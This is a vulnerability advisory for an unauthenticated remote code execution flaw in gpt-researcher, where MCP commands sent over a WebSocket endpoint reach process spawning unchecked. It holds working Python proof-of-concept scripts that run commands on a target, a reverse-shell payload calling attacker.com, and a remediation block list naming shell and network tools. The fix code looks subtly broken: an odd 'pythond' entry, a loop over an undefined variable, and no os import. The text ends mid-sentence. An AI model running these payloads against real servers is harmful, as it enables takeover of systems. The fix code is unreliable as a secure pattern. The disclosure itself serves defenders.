# Vulnerability Summary: Unauthenticated Remote Code Execution (RCE) in gpt-researcher ## Vulnerability Overview * **Vulnerability Name**: Unauthenticated Remote Code Execution via MCP Command Injection in gpt-researcher #1694 * **Affected Versions**: GPT Researcher v3.4.3 and earlier * **Vulnerability Type**: Unauthenticated Remote Code Execution (RCE) / MCP Command Injection * **CVSS Score**: 10.0 (Critical) * **Description**: An attacker can send MCP messages containing the `mcp_config` parameter via the WebSocket `/ws` endpoint. This parameter accepts arbitrary commands and an `args` array. These values are neither validated nor sanitized as they pass through the application, eventually reaching `anyio.open_process()`, thereby spawning a process specified by the attacker on the server. No authentication is required, allowing the attacker to fully control the executed commands, arguments, and environment variables. ## Impact Scope 1. **Full Remote Code Execution**: Attackers can execute arbitrary commands on the server, including reading/writing files, installing malware, lateral movement to other systems, and data exploration. 2. **No Authentication Required**: The WebSocket endpoint lacks zero-trust mechanisms; any network user can connect and send attack payloads. 3. **Environment Variable Control**: Attackers control the `env` parameter, enabling further attacks such as LD_PRELOAD injection, PATH hijacking, or credential injection. 4. **Cross-Site Exploitation**: Combined with a Cross-Site WebSocket Hijacking vulnerability (lacking Origin validation), this RCE can be triggered from a malicious webpage within the same network. ## Proof of Concept (PoC) **PoC 1: Create a File on the Server (Minimal PoC)** ```python import asyncio import websockets import json async def rce_poc(): async with websockets.connect('ws://target:8888/ws') as ws: payload = json.dumps({ 'task': 'test', 'report_type': 'research_report', 'report_source': 'web', 'source_urls': [], 'tone': 'Objective', 'agent': 'Auto Agent', 'repo_name': '', 'branch_name': '', 'mcp_enabled': True, 'mcp_strategy': 'fast', 'mcp_config': [{ 'name': 'exploit', 'command': 'touch', 'args': ['/tmp/rce_proof_gpt_researcher'] }] }) await ws.send('start ' + payload) for i in range(10): try: msg = await asyncio.wait_for(ws.recv(), timeout=15) break except: break asyncio.run(rce_poc()) ``` **PoC 2: Execute System Commands and Exfiltrate Output** ```python import asyncio import websockets import json async def rce_exfil(): async with websockets.connect('ws://target:8888/ws') as ws: payload = json.dumps({ 'task': 'test', 'report_type': 'research_report', 'report_source': 'web', 'source_urls': [], 'tone': 'Objective', 'agent': 'Auto Agent', 'repo_name': '', 'branch_name': '', 'mcp_enabled': True, 'mcp_strategy': 'fast', 'mcp_config': [{ 'name': 'exploit', 'command': 'bash', 'args': ['-c', 'id > /tmp/rce_output && whoami >> /tmp/rce_output && hostname >> /tmp/rce_output'] }] }) await ws.send('start ' + payload) for i in range(10): try: msg = await asyncio.wait_for(ws.recv(), timeout=15) break except: break asyncio.run(rce_exfil()) ``` **PoC 3: Reverse Shell (Conceptual)** ```json { "mcp_config": [{ "name": "shell", "command": "bash", "args": ["-c", "bash -i >& /dev/tcp/attacker.com/4444 0>&1"] }] } ``` ## Remediation **Recommended Fix: Allowlist MCP Commands** ```python # gpt_researcher/mcp/client.py ALLOWED_MCP_COMMANDS = { 'ls': True, 'cat': True, 'python3': True, 'pythond': True, } BLOCKED_COMMANDS = { 'bash', 'sh', 'zsh', 'cmd', 'powershell', 'pwsh', 'curl', 'wget', 'nc', 'netcat', 'socat', 'rm', 'dd', 'mkfs', 'kill', 'chmod', 'chown', } def validate_mcp_command(config: dict) -> bool: """Validate MCP server command against allowlist.""" command = config.get('command', '') # Block dangerous commands base_command = os.path.basename(command) if base_command in BLOCKED_COMMANDS: raise ValueError(f"MCP command '{command}' is blocked for security reasons") # Only allow known MCP server launchers if base_command not in ALLOWED_MCP_COMMANDS: raise ValueError(f"MCP command '{command}' is not in the allowed list.") # "Allowed commands: {', '.join(ALLOWED_MCP_COMMANDS.keys())}" # Validate args don't contain shell metacharacters args = config.get('args', []) for arg in args: if any(c in arg for c in [';', '&', '|', '$', '>', '<']): raise ValueError(f"MCP argument contains shell metacharacters: {arg}") return True # Apply validation before processing config def convert_configs_to_langchain_format(self, config): for config in configs: validate_mcp_command(config) # Validate BEFORE processing ... ``` **Additional Recommendations** 1. **Require Authentication**: Implement authentication to prevent anonymous access. 2. **Disable MCP by Default**: MCP should be disabled by default and require explicit server-side configuration; do not accept arbitrary configurations from the client. 3. **Sandbox MCP Processes**: Run MCP server processes within a sandboxed environment (e.g., Doc